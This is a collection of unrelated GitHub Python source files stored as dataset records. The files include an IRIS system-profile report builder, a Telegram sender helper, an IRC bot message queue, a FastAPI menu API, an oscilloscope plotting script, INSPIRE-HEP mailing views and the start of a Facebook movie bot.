sp_dict[f\"warning {warn_count}\"] = (\n f\"max locked memory {sp_dict['max locked memory']} kb too \"\n f\"small to lock shared memory segment in memory without huge \"\n f\"pages (see ulimit -a) \"\n )\n\n # Huge pages is specified, validate\n else:\n sp_dict[\"hugepages MB\"] = round(int(sp_dict[\"vm.nr_hugepages\"]) * huge_page_size_kb / 1024)\n\n if sp_dict[\"hugepages MB\"] < sp_dict[\"shared memory MB\"]:\n warn_count += 1\n sp_dict[\n f\"warning {warn_count}\"\n ] = f\"shared memory is {sp_dict['shared memory MB']:,} MB hugepages is {sp_dict['hugepages MB']:,} MB\"\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"HugePages is set:\"\n pass_count += 1\n msg = f\"Total memory is {int(sp_dict['memory MB']):,} MB. \"\n sp_dict[f\"pass {pass_count}\"] = msg\n\n pass_count += 1\n msg = (\n f\"75% of total memory is {int(sp_dict['75pct memory MB']):,} MB. \"\n f\"Shared memory is {sp_dict['shared memory MB']:,}, {round(sp_dict['shared memory MB'] / int(sp_dict['memory MB']) * 100):,}% of total memory.\"\n )\n sp_dict[f\"pass {pass_count}\"] = msg\n\n pass_count += 1\n msg = (\n f\"Shared memory (globals+routines+gmheap+other) is {sp_dict['shared memory MB']:,} MB, hugepages is {sp_dict['hugepages MB']:,} MB, \"\n f\"gap is {sp_dict['hugepages MB'] - sp_dict['shared memory MB']:,} MB. \"\n f\"Shared memory is {round((sp_dict['shared memory MB']) / int(sp_dict['hugepages MB']) * 100):,}% of huge pages.\"\n )\n sp_dict[f\"pass {pass_count}\"] = msg\n\n if \"kernel.shmmax\" in sp_dict:\n\n if int(sp_dict[\"kernel.shmmax\"]) == 18446744073692774399:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"Kernel shared memory limit is at default\"\n else:\n if \"hugepages MB\" in sp_dict:\n if int(sp_dict[\"kernel.shmmax\"]) < sp_dict[\"hugepages MB\"] * 1024 * 1024:\n warn_count += 1\n sp_dict[\n f\"warning {warn_count}\"\n ] = f\"Kernel shared memory limit must be higher than hugepages.\"\n else:\n pass_count += 1\n sp_dict[f\"pass {pass_count}\"] = f\"Kernel shared memory limit is higher than hugepages\"\n\n # dirty_* parameters are not relevant if using async IO – which any IRIS-based install should be.\n # A better question is async io set?\n # if \"vm.dirty_background_ratio\" in sp_dict:\n # if int(sp_dict[\"vm.dirty_background_ratio\"]) > 5:\n # warn_count += 1\n # sp_dict[\n # f\"warning {warn_count}\"] = f\"dirty_background_ratio is {sp_dict['vm.dirty_background_ratio']}. InterSystems recommends setting this parameter to 5. This setting is the maximum percentage of active memory that can be filled with dirty pages before pdflush begins to write them.\"\n # else:\n # pass_count += 1\n # sp_dict[f\"pass {pass_count}\"] = f\"dirty_background_ratio is {sp_dict['vm.dirty_background_ratio']}\"\n #\n # if \"vm.dirty_ratio\" in sp_dict:\n # if int(sp_dict[\"vm.dirty_ratio\"]) > 10:\n # warn_count += 1\n # sp_dict[\n # f\"warning {warn_count}\"] = f\"dirty_ratio is {sp_dict['vm.dirty_ratio']}. InterSystems recommends setting this parameter to 10. This setting is the maximum percentage of total memory that can be filled with dirty pages before processes are forced to write dirty buffers themselves during their time slice instead of being allowed to do more writes. These changes force the Linux pdflush daemon to write out dirty pages more often rather than queue large amounts of updates that can potentially flood the storage with a large burst of updates\"\n # else:\n # pass_count += 1\n # sp_dict[f\"pass {pass_count}\"] = f\"dirty_ratio is {sp_dict['vm.dirty_ratio']}\"\n\n # Debug\n\n # for key in sp_dict:\n # print(f\"{key} : {sp_dict[key]}\")\n\n # Some tidy up if empty\n\n if \"platform\" not in sp_dict:\n sp_dict[\"platform\"] = \"N/A\"\n if \"shared memory calc\" not in sp_dict:\n sp_dict[\"shared memory calc\"] = \"\"\n if \"shared memory MB\" not in sp_dict:\n sp_dict[\"shared memory MB\"] = 0\n hostname = \"N/A\"\n if \"linux hostname\" in sp_dict:\n hostname = sp_dict[\"linux hostname\"]\n if \"windows host name\" in sp_dict:\n hostname = sp_dict[\"windows host name\"]\n\n # Build log\n\n log = f\"System Summary for {sp_dict['customer']}\\n\\n\"\n log += f\"Hostname : {hostname}\\n\"\n log += f\"Instance : {sp_dict['instance']}\\n\"\n\n log += f\"Operating system : {sp_dict['operating system']}\\n\"\n log += f\"Platform : {sp_dict['platform']}\\n\"\n log += f\"CPUs : {sp_dict['number cpus']}\\n\"\n if sp_dict[\"operating system\"] == \"AIX\" and \"AIX SMT\" in sp_dict:\n log += f\"SMT : {sp_dict['AIX SMT']}\\n\"\n log += f\"Processor model : {sp_dict['processor model']}\\n\"\n log += f\"Memory : {sp_dict['memory GB']} GB\\n\"\n log += f\"Shared memory : {sp_dict['shared memory calc']} = {int(sp_dict['shared memory MB']):,} MB\\n\"\n log += f\"Version : {sp_dict['version string']}\\n\"\n log += f\"Date collected : {sp_dict['profile run']}\\n\"\n\n first_pass = True\n for key in sp_dict:\n if \"pass\" in key:\n if first_pass:\n log += \"\\nPasses:\\n\"\n first_pass = False\n log += f\"- {sp_dict[key]}\\n\"\n\n first_warning = True\n for key in sp_dict:\n if \"warn\" in key:\n if first_warning:\n log += \"\\nWarnings:\\n\"\n first_warning = False\n log += f\"- {sp_dict[key]}\\n\"\n\n recommendations_count = False\n log += \"\\nRecommendations:\\n\"\n\n if not first_warning:\n log += f\"- Review and fix warnings above\\n\"\n\n for key in sp_dict:\n if \"recommend\" in key:\n recommendations_count = True\n log += f\"- {sp_dict[key]}\\n\"\n\n if not recommendations_count and first_warning:\n log += f\"- No recommendations\\n\"\n\n first_instance = True\n for key in sp_dict:\n if \"up instance\" in key:\n if first_instance:\n log += \"\\nAll instances on this host:\\n\"\n first_instance = False\n log += f\"- {sp_dict[key]}\\n\"\n\n log += \"\\nStorage:\\n\"\n\n log += f\"Current journal : {sp_dict['current journal']}\\n\"\n log += f\"Alternate journal : {sp_dict['alternate journal']}\\n\"\n log += f\"Days before purge : {sp_dict['DaysBeforePurge']}\\n\"\n if \"wijdir\" in sp_dict:\n log += f\"WIJ directory : {sp_dict['wijdir']}\\n\"\n\n log += \"\\nAdditional:\\n\"\n if \"IRISSYS\" in sp_dict:\n log += f\"IRISSYS : {sp_dict['IRISSYS']}\\n\"\n if \"CACHESYS\" in sp_dict:\n log += f\"CACHESYS : {sp_dict['CACHESYS']}\\n\"\n\n first_dev_mapper = True\n for key in sp_dict:\n if \"dev mapper\" in key:\n if first_dev_mapper:\n log += \"\\n/dev/mapper:\\n\"\n first_dev_mapper = False\n log += f\"{sp_dict[key]}\\n\"\n\n first_filesystem = True\n for key in sp_dict:\n if \"filesystem df\" in key:\n if first_filesystem:\n log += \"\\nFilesystem (df):\\n\"\n first_filesystem = False\n log += f\"{sp_dict[key]}\\n\"\n\n if \"Estimated total IRIS shared memory\" in sp_dict:\n log += f\"\\n--------------------------------------------------------------------------------------------------\\n\"\n log += f\"Estimated total shared memory for IRIS 2022.1 and later: \"\n log += f\"{int(sp_dict['Estimated total IRIS shared memory']):,} (MB)\\n\\n\"\n log += f'{sp_dict[\"Estimated total IRIS shared memory text\"]}\\n'\n\n if \"hugepages MB\" in sp_dict and \"memory MB\" in sp_dict:\n if sp_dict[\"hugepages MB\"] < sp_dict[\"Estimated total IRIS shared memory\"]:\n log += f\"Warning:\\n\"\n log += f\"Estimated shared memory is {sp_dict['Estimated total IRIS shared memory']:,} MB, \"\n log += f\"hugepages is {sp_dict['hugepages MB']:,} MB\\n\\n\"\n\n log += f\"Total memory is {int(sp_dict['memory MB']):,} MB.\\n\"\n log += (\n f\"75% of total memory is {int(sp_dict['75pct memory MB']):,} MB. \"\n f\"Estimated shared memory is {sp_dict['Estimated total IRIS shared memory']:,}, \"\n f\"{round(sp_dict['Estimated total IRIS shared memory'] / int(sp_dict['memory MB']) * 100):,}% \"\n f\"of total memory.\\n\"\n )\n log += (\n f\"Estimated shared memory (globals+routines+gmheap+other) is {sp_dict['Estimated total IRIS shared memory']:,} MB\"\n f\", hugepages is {sp_dict['hugepages MB']:,} MB, \"\n f\"gap is {sp_dict['hugepages MB'] - sp_dict['Estimated total IRIS shared memory']:,} MB. \"\n f\"Shared memory is \"\n f\"{round((sp_dict['Estimated total IRIS shared memory']) / int(sp_dict['hugepages MB']) * 100):,}\"\n f\"% of huge pages.\\n\"\n )\n log += (\n f\"Current shared memory (from ipcs -m) is \"\n f\"{int(sp_dict['Shared memory segment total']/1024/1024):,} MB\"\n f\", hugepages is {sp_dict['hugepages MB']:,} MB, \"\n f\"gap is {sp_dict['hugepages MB'] - int(sp_dict['Shared memory segment total']/1024/1024):,} MB. \"\n f\"Shared memory is \"\n f\"{round((int(sp_dict['Shared memory segment total']/1024/1024))/int(sp_dict['hugepages MB']) * 100):,}\"\n f\"% of huge pages.\\n\\n\"\n )\n\n log += f\"Note:\\n\"\n log += f\"Estimated shared memory only accounts for IRIS. \"\n log += f\"Other components such as JVM for reports are not included.\\n\"\n\n log += f\"Confirm Huge Pages setting on the first IRIS startup. Especially for instances with low RAM.\"\n log += f\" Adjust global buffers down if needed.\\n\"\n log += f\"Start IRIS with all your CPF parameters set to desired values without HugePages allocated, record \"\n log += f\"the total shared memory segment size from the messages.log,\\nand then use that as the figure for \"\n log += f\"calculating/allocating HugePages and then restart IRIS.\\n\"\n\n first_shared_memory = True\n for key in sp_dict:\n if \"Shared memory ipcs\" in key:\n if first_shared_memory:\n log += \"\\nShared memory from ipcs -m:\\n\"\n first_shared_memory = False\n log += f\"{sp_dict[key]}\\n\"\n\n log += \"\\nEnd of report.\"\n\n yaspe_yaml = \"yaspe:\\n\"\n yaspe_yaml += f\" Site: {sp_dict['customer'].replace(':','-')}\\n\"\n yaspe_yaml += f\" Hostname: {hostname}\\n\"\n yaspe_yaml += f\" Instance: {sp_dict['instance']}\\n\"\n\n yaspe_yaml += f\" Operating system: {sp_dict['operating system']}\\n\"\n yaspe_yaml += f\" Platform: {sp_dict['platform']}\\n\"\n yaspe_yaml += f\" CPUs: {sp_dict['number cpus']}\\n\"\n\n yaspe_yaml += f\" Processor model: {sp_dict['processor model'].replace(':','-')}\\n\"\n yaspe_yaml += f\" Memory: {sp_dict['memory GB']} GB\\n\"\n yaspe_yaml += f\" Shared memory: {sp_dict['shared memory calc']} = {int(sp_dict['shared memory MB']):,} MB\\n\"\n yaspe_yaml += f\" Version: {sp_dict['version string'].replace(':','-')}\\n\"\n yaspe_yaml += f\" Date collected: {sp_dict['profile run'].replace(':','-')}\\n\"\n\n return log, yaspe_yaml\n","repo_name":"murrayo/yaspe","sub_path":"sp_check.py","file_name":"sp_check.py","file_ext":"py","file_size_in_byte":34128,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"15725746026","text":"# Faça um programa que peça dois números, base e expoente, calcule e\n# mostre o primeiro número elevado ao segundo número. Não utilize a função\n# de potência da linguagem\n\nn1 = int(input(\"Digite um número: \"))\nn2 = int(input(\"Digite outro número: \"))\ncount = 1\n\nwhile n2 > 0:\n count = count * n1\n n2-= 1\n\nprint(count)","repo_name":"nascimentolds/IFPE","sub_path":"ADS/1-PERIODO/LP/20230309/20230309-ex5.py","file_name":"20230309-ex5.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38547649534","text":"import asyncio\n\nfrom typing import Union, Optional\n\nfrom aiogram import Bot\nfrom aiogram.types import (\n CallbackQuery,\n Message,\n FSInputFile,\n UNSET_PARSE_MODE,\n InlineKeyboardMarkup\n)\n\nfrom usefulgram.exceptions import MessageTooOld\nfrom usefulgram.lazy.sender import MessageSender\nfrom usefulgram.lazy.stable_wait import StableWaiter\nfrom usefulgram.lazy.callback_responder import CallbackAnswer\n\n\nclass LazySender:\n _event: Union[CallbackQuery, Message]\n _bot: Bot\n _stable: bool\n\n def __init__(\n self,\n event: Union[CallbackQuery, Message],\n bot: Bot,\n stable: bool = False\n ):\n\n self._event = event\n self._bot = bot\n self._stable = stable\n\n @staticmethod\n def get_empty_text() -> str:\n spaces = \" ⁣\" * 65\n\n return f\"⁣{spaces}⁣\"\n\n async def send(\n self,\n text: Optional[str] = None,\n photo: Optional[FSInputFile] = None,\n video: Optional[FSInputFile] = None,\n reply_markup: Optional[InlineKeyboardMarkup] = None,\n parse_mode: Union[str] = UNSET_PARSE_MODE,\n disable_web_page_preview: bool = False,\n answer_text: Optional[str] = None,\n answer_show_alert: bool = False,\n autoanswer: bool = True\n ) -> Message:\n \"\"\"\n Smart send menager\n\n :param text:\n :param photo:\n :param video:\n :param reply_markup:\n :param parse_mode:\n :param disable_web_page_preview:\n :param answer_text:\n :param answer_show_alert:\n :param autoanswer:\n :return:\n \"\"\"\n\n if isinstance(self._event, CallbackQuery):\n if self._event.message is None:\n await self._event.answer(\"Message too old\")\n\n raise MessageTooOld\n\n chat_id = self._event.message.chat.id\n thread_id = self._event.message.message_thread_id\n dt = self._event.message.date\n\n else:\n chat_id = self._event.chat.id\n thread_id = self._event.message_thread_id\n dt = self._event.date\n\n if self._stable:\n await asyncio.sleep(StableWaiter.get_stable_wait_time(dt))\n\n if text is None:\n text = self.get_empty_text()\n\n result = await MessageSender.send(\n bot=self._bot,\n chat_id=chat_id,\n text=text,\n message_thread_id=thread_id,\n photo=photo,\n video=video,\n reply_markup=reply_markup,\n parse_mode=parse_mode,\n disable_web_page_preview=disable_web_page_preview\n )\n\n if isinstance(self._event, CallbackQuery):\n await CallbackAnswer.auto_callback_answer(\n bot=self._bot,\n callback_id=self._event.id,\n autoanswer=autoanswer,\n answer_text=answer_text,\n answer_show_alert=answer_show_alert\n )\n\n return result\n","repo_name":"Sethis/usefulgram","sub_path":"usefulgram/lazy/lazy_sender.py","file_name":"lazy_sender.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10487998606","text":"import os\nfrom pbthread import PBThread\nfrom actionqueue import ActionQueue\n\n\nclass OutboundMessageThread(PBThread):\n ''' If the bot is going to send a message/command to the IRC server, it\n must do so through this class.\n\n Use the add() function to add an outbound message/command. For example, to\n privmsg the user 'pastly':\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.privmsg, ['pastly', 'I dont like sand'])\n\n More generally, specify the function you want to call as the first argument\n to add(), any arguments you want to pass to it in as a list, and finally\n any keyword arguments you want to pass to it as a dictionary.\n '''\n\n def __init__(self, global_state,\n long_timeout=5, time_between_actions_func=None):\n PBThread.__init__(self, self._enter, name='OutboundMessage')\n self._action_queue = \\\n ActionQueue(long_timeout=long_timeout,\n time_between_actions_func=time_between_actions_func)\n self.update_global_state(global_state)\n\n def update_global_state(self, gs):\n self._log = gs['log']\n self._conf = gs['conf']\n self._server_dir = os.path.join(\n gs['conf']['ii']['ircdir'], gs['conf']['ii']['server'])\n self._end_event = gs['events']['kill_outmessage']\n\n def _enter(self):\n log = self._log\n log.info('Started OutboundMessageThread instance')\n while not self._end_event.is_set():\n self._action_queue.loop_once()\n self._shutdown()\n\n def _shutdown(self):\n log = self._log\n log.info('OutboundMessageThread going away')\n\n def add(self, *args, **kwargs):\n ''' Use this function to add outbound messages/commands.\n\n The args and kwargs arguments in this function do NOT correspond to\n the args and kwargs that get passed to the member function. They are\n a very confusing way to give OutboundMessageThread.add the same\n signature as ActionQueue.add.\n\n All of the following should be equivalent and result in the same thing.\n They should all result in OutboundMessageThread.servmsg getting the\n message 'hi mom' and log_it set to False, and the function call will\n be added to our ActionQueue with priority 55.\n\n >>> omt.add(omt.servmsg,\n args=['hi mom'],\n kwargs={'log_it': False},\n priority=55)\n >>> omt.add(omt.servmsg,\n ['hi mom'],\n {'log_it': False},\n priority=55)\n >>> omt.add(omt.servmsg,\n ['hi mom'],\n kwargs={'log_it': False},\n 55)\n '''\n self._action_queue.add(*args, **kwargs)\n\n def servmsg(self, message, log_it=False):\n ''' Do not call this function directly. Pass it as an argument to add()\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.servmsg, ['/mode #foo +i'])\n '''\n if log_it and False:\n self._log.notice('Sending:', message)\n fname = os.path.join(self._server_dir, 'in')\n try:\n with open(fname, 'w') as server_in:\n while True:\n try:\n server_in.write('{}\\n'.format(message))\n except BrokenPipeError as e:\n log.warn(e, 'trying again in 0.1s')\n time.sleep(0.1)\n continue\n else:\n break\n except BrokenPipeError as e:\n self._log.warn(e, 'will not try again')\n\n def privmsg(self, nick, message, **kwargs):\n ''' Do not call this function directly. Pass it as an argument to add()\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.privmsg, ['pastly', 'You left the stove on'])\n '''\n self.servmsg('/privmsg {} {}'.format(nick, message), **kwargs)\n\n def notice(self, target, message, **kwargs):\n ''' Do not call this function directly. Pass it as an argument to add()\n\n >>> omt = outbound_message_thread\n >>> omt.add(omt.notice, ['#foobar', 'Promise this isnt spam'])\n '''\n self.servmsg('/notice {} {}'.format(target, message), **kwargs)\n","repo_name":"pastly/tor-ircbot","sub_path":"outboundmessagethread.py","file_name":"outboundmessagethread.py","file_ext":"py","file_size_in_byte":4300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43022042205","text":"class Solution:\n def twoSum(self, numbers: List[int], target: int) -> List[int]:\n start = 0\n end = len(numbers)-1\n \n while start < end:\n sum = numbers[start] + numbers[end]\n if sum == target:\n return [start+1, end+1]\n elif sum < target:\n start += 1\n else:\n end -= 1\n return [] \n \n #two pointer不斷移動左指針 調整又指針 向中間移相等即可\n #有備註說明Your returned answers (both index1 and index2) are not zero-based,若習慣從0開始,所以最後return再加一也可 [start+1, end+1]\n \n \n \n \n'''\nLeetcode-Easy\n167. Two Sum II - Input array is sorted\nRuntime: 64 ms, faster than 68.77%\n\nsorted in ascending order 上升排序\n\n'''\n","repo_name":"kaitlynning/Py-practice","sub_path":"167. Two Sum II - Input array is sorted.py","file_name":"167. Two Sum II - Input array is sorted.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"33264112932","text":"from fastapi import FastAPI\nfrom pydantic import BaseModel\nfrom fastapi.middleware.cors import CORSMiddleware #imports middelware for handling CORS\n\napp = FastAPI()\n\n#calls middleware that handles cors\n#the * declaration says that all origins are allowed\napp.add_middleware(\n CORSMiddleware,\n allow_origins=['*']\n)\n\nclass Msg(BaseModel):\n msg: str\n\n\nmenuitems = [ {\n \"char_id\": 1,\n \"itemName\": \"Pork Belly Noodle Bowl\",\n \"price\": \"$24.00\",\n \"img\": \"https://media-cdn.tripadvisor.com/media/photo-m/1280/18/cd/03/93/pork-belly-noodle-bowl.jpg\",\n \"ingredients\": \"Noodles, Pork Belly, Broth\",\n \"allergens\": \"gluten, eggs, soy\",\n},\n{\n \"char_id\": 2,\n \"itemName\": \"Asian-marinated Airline Chicken\",\n \"price\": \"$24.00\",\n \"img\": \"https://media.wdwnt.com/2019/10/new-kona-cafe-menu-sticky-wings-airplane-chicken-polynesian-resort_17-1200x675.jpg\",\n \"ingredients\": \"Sticky Rice, Bok Choy, Asian Glaze\",\n \"allergens\": \"dairy, soy\",\n},\n{\n \"char_id\": 3,\n \"itemName\": \"Turkey Banh Mi\",\n \"price\": \"$18.00\",\n \"img\": \"https://i1.wp.com/www.wdwopinion.com/wp-content/uploads/2020/01/IMG_8386-scaled.jpg?fit=1024%2C768&ssl=1\",\n \"ingredients\": \"Slow-roasted Turkey Breast, Black Pepper Bacon, Pork Pâte, Cilantro, Jalapeño, Onions, and Grilled Poblano Mayonnaise served with French Fries\",\n \"allergens\": \"gluten, dairy\",\n},\n]\n\n@app.get('/')\n\nasync def read_root():\n return menuitems","repo_name":"alindo001/python_API","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"25147045933","text":"# Module imports\nimport matplotlib.pyplot as plt\nimport matplotlib.ticker as ticker\nimport matplotlib.animation as animation\n\nimport niscope\n\n# Plot default configurations\nplt.rcParams[\"figure.figsize\"] = [7.50, 3.50]\nplt.rcParams[\"figure.autolayout\"] = True\n\n# Creation of plot figure and axis\nfig, ax = plt.subplots()\n\n# Number of samples to be read\nnum_samples = 250\n\ndef update_samples(waveforms):\n \"\"\"Function used to read from the scope, and constantly update the samples array\"\"\"\n samples = []\n # The 'samples' attribute returns a memory address. To get the samples list, iterate over waveforms[0].samples and append them to a new list\n for sample in waveforms[0].samples: # waveforms[0] corresponds to the first, and only in this example, waveform in the list\n samples.append(sample)\n return samples\n\ndef animate(i):\n \"\"\"Function which constantly reads waveform samples and updates the plot\"\"\"\n waveforms = session.channels[\"1\"].read(num_samples=num_samples)\n line.set_ydata(update_samples(waveforms=waveforms))\n return line,\n\nwith niscope.Session(resource_name='PXIe5160', options={}) as session:\n # Scope configuration\n session.configure_vertical(range=5.0, coupling=niscope.VerticalCoupling.AC)\n session.configure_horizontal_timing(min_sample_rate=50000000, min_num_pts=num_samples, ref_position=50.0, num_records=1, enforce_realtime=True)\n\n # Read and store waveform. Read() returns a list of waveforms, with each channel being an element of the list\n # The elements within each channel are WaveformInfo class instances, with attributes that can be accessed\n waveforms = session.channels[\"1\"].read(num_samples=num_samples)\n\n # The x_increment attribute returns the delta-t (dt) of the waveform. Multiplying this by a range of num_samples ensures that both x and y axes have the same length\n x_time = [waveforms[0].x_increment * x for x in range(num_samples)]\n\n # line object which will be used as a return value for the plot animation\n line, = ax.plot(x_time, update_samples(waveforms=waveforms))\n\n # Plot configuration\n ax.xaxis.set_major_formatter(ticker.EngFormatter(unit=\"s\"))\n ax.yaxis.set_major_formatter(ticker.EngFormatter(unit=\"V\"))\n ax.set_xlabel('Time (s)')\n ax.set_ylabel('Voltage (V)')\n ax.grid()\n\n # Below object is used to iterate over the animate() function and constantly update the plot\n ani = animation.FuncAnimation(fig, animate, interval=100, blit=True, save_count=50)\n\n plt.title(label=\"Waveform Graph\")\n plt.show()\n\n session.abort()\n","repo_name":"Seralfesp/nidriver-python-examples","sub_path":"src/niscope/niScope Continuously Update Graph.py","file_name":"niScope Continuously Update Graph.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41024738648","text":"from datetime import datetime\n\nimport pytz\nimport structlog\nfrom feedgen.feed import FeedGenerator\nfrom flask import Blueprint, Response, current_app, request\nfrom redis import StrictRedis\n\nfrom inspirehep.mailing.api.jobs import subscribe_to_jobs_weekly_list\nfrom inspirehep.serializers import jsonify\n\nfrom .loaders import JobsWeeklySubscribeSchema\n\nLOGGER = structlog.getLogger()\n\nblueprint = Blueprint(\n \"inspirehep_mailing\", __name__, template_folder=\"templates\", url_prefix=\"/mailing\"\n)\n\n\n@blueprint.route(\"/subscribe/jobs/weekly\", methods=[\"POST\"])\ndef subscribe_jobs_weekly():\n try:\n data = request.get_json()\n result = JobsWeeklySubscribeSchema().load(data)\n if result.errors:\n LOGGER.info(\"Validation error.\", user=data, errors=result.errors)\n return (\n jsonify({\"message\": \"Validation Error.\", \"errors\": result.errors}),\n 400,\n )\n\n subscribe_to_jobs_weekly_list(\n result.data[\"email\"], result.data[\"first_name\"], result.data[\"last_name\"]\n )\n LOGGER.info(\"User successfuly subscribed.\", user=data)\n return jsonify({\"message\": \"Succesfully subscribed.\"}), 200\n except Exception:\n LOGGER.exception(\"Cannot subscribe user to list.\", user=data)\n return jsonify({\"message\": \"Unexpected error.\"}), 500\n\n\n@blueprint.route(\"/rss/jobs/weekly\")\ndef get_weekly_jobs_rss():\n redis_url = current_app.config.get(\"CACHE_REDIS_URL\")\n jobs_weekly_email_key = current_app.config.get(\"WEEKLY_JOBS_EMAIL_REDIS_KEY\")\n\n redis = StrictRedis.from_url(redis_url)\n\n raw_email_entry = redis.hgetall(jobs_weekly_email_key)\n title = raw_email_entry[b\"title\"].decode(\"UTF-8\")\n content = raw_email_entry[b\"html\"].decode(\"UTF-8\")\n timestamp = float(raw_email_entry[b\"timestamp\"])\n date = datetime.fromtimestamp(timestamp, tz=pytz.UTC)\n\n feed = FeedGenerator()\n feed.link(href=request.url_root)\n feed.title(\"INSPIRE Weekly HEP Jobs\")\n feed.author({\"name\": \"inspirehep.net\"})\n feed.description(\"Feed for weekly HEP jobs from INSPIRE\")\n feed.pubDate(date)\n feed.lastBuildDate(date)\n\n entry = feed.add_entry()\n entry.id(str(timestamp))\n entry.title(title)\n entry.content(content)\n entry.published(date)\n\n return Response(response=feed.rss_str(), mimetype=\"application/rss+xml\")\n","repo_name":"inspirehep/inspirehep","sub_path":"backend/inspirehep/mailing/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"3"} +{"seq_id":"937027102","text":"import pandas as pd\nimport setup\nimport nexussdk as nexus\nimport json\nconfig = setup.config\n\nfrom DbConnection import connect_to_db\nimport NexusSparqlQuery as qns\n\nengine = connect_to_db()\n\nnexus_deployment = setup.nexus_deployment\norg = setup.nexus_org\nproject = setup.nexus_project\ntoken = setup.token\n\nsparqlview_endpoint = setup.sparqlview_endpoint\nsparqlview_wrapper = setup.sparqlview_wrapper\n\n# create nexus connection\nnexus = setup.nexus\n\n# Opening JSON file\nf = open('resource_deprecation_mapping.json')\nresource_mapping_dict = json.load(f)\nresource_mapping_dict\n\nfor resource_mapping in resource_mapping_dict:\n \n print(resource_mapping['postgres_table_name'])\n \n # let's get a list of all research studies from postgres\n query = f\"\"\"\n select \n distinct {resource_mapping['postgres_uri_field_name']} resource_uri \n from \n mpg_eln_dev.{resource_mapping['postgres_table_name']}\n where\n {resource_mapping['postgres_uri_field_name']} is not null\n \"\"\"\n pg_df = pd.read_sql(query, engine)\n print(f\"Length of postgres query: {len(pg_df)}\")\n \n query_prefix = \"\"\"\n prefix nxv: <https://bluebrain.github.io/nexus/vocabulary/>\n prefix fhir: <http://hl7.org/fhir/>\n prefix nidm: <http://purl.org/nidash/nidm#>\n prefix sdo: <https://schema.org/>\n \n \"\"\"\n \n if resource_mapping.get('nexus_resource_type_regex', False):\n \n print(resource_mapping['nexus_resource_type_regex'])\n \n query_body = f\"\"\"\n \n select * where {{\n ?resource_uri nxv:deprecated false .\n FILTER NOT EXISTS {{ ?resource_uri nxv:deprecated true }} .\n ?resource_uri a ?resource_type .\n FILTER (regex(str(?resource_type), \"{resource_mapping['nexus_resource_type']}\", \"i\")) .\n }}\n \n \"\"\"\n else:\n query_body = f\"\"\"\n \n select * where {{\n ?resource_uri nxv:deprecated false .\n FILTER NOT EXISTS {{ ?resource_uri nxv:deprecated true }} .\n ?resource_uri a {resource_mapping['nexus_resource_type']} .\n }}\n \n \"\"\"\n \n sparql_query = query_prefix + query_body\n \n df = qns.query_sparql(sparql_query,sparqlview_wrapper)\n df = qns.sparql2dataframe(df)\n print(f\"Length of sparql query: {len(df)}\")\n \n # join the data frames\n join_df = pg_df.merge(\n df,\n how = 'right',\n on = 'resource_uri',\n indicator = True\n )\n\n # delete resources that are only in Nexus\n nexus_only_df = join_df.loc[join_df['_merge']=='right_only']\n print(f\"Resources to delete: {len(nexus_only_df)}\")\n \n for index, row in nexus_only_df.iterrows():\n resource = nexus.resources.fetch(org, project, row['resource_uri'])\n print(resource[\"@id\"])\n \n try:\n nexus.resources.deprecate(resource) \n except:\n print(\"Could not deprecate\")\n ","repo_name":"Cogitate-consortium/xnat-nexus-etl","sub_path":"nexus_etl/dw_to_nexus/DeprecateResources.py","file_name":"DeprecateResources.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"43560241260","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Sep 9 00:23:22 2017\n\n@author: Tobi\n\"\"\"\n\nimport numpy as np\n\ntext_file = open(r\"C:\\Users\\Tobi\\Documents\\Python Scripts\\EulerProject\\p099_base_exp.txt\", \"r\")\nlines = text_file.read()\ntemp = lines.splitlines()\n#temp.split(',')\ntext_file.close()\n\nlst=[]\nfor i in range(0,len(temp)):\n spl = temp[i].split(',')\n lst.extend(spl)\n \nlargest = float(lst[1]) * np.math.log(float(lst[0]))\nfor i in range(0,int(len(lst) / 2)):\n a = float(lst[2*i +1 ]) * np.math.log(float(lst[2*i]))\n if a > largest:\n largest_idx = i\n largest = a\n\nprint(largest_idx+1) # Python fängt bei 0 an zu zählen, die Frage war aber nach der Zeilennummer\nprint(largest)","repo_name":"TobiasK87/project_euler","sub_path":"Problem99.py","file_name":"Problem99.py","file_ext":"py","file_size_in_byte":704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"23434032409","text":"# coding: utf-8\nimport contextlib\nimport json\nimport urllib2\n\nimport settings\nfrom fb_bot.fb_api_wrapper import construct_message_with_attachment, \\\n construct_message_with_text\nfrom fb_bot.movie_info import get_movie_poster, get_movie_trailer_link\n\n\ndef get_data(url):\n with contextlib.closing(urllib2.urlopen(url)) as jf:\n return json.loads(jf.read())\n\n\ndef _construct_final_payload(recipient_id, movies, n_movies):\n quick_replies = [\n {\n 'content_type': 'text',\n 'title': 'Ещё фильмы',\n 'payload': '/premiere{}'.format(n_movies)\n }\n ]\n payload = construct_message_with_attachment(\n recipient_id, movies, quick_replies\n )\n return payload\n\n\ndef _construct_film_info(poster, description, trailer_url, movie):\n if 'kinohod_id' in movie:\n my_id = 'kinohod_id'\n else:\n my_id = 'id'\n if not trailer_url or not poster:\n 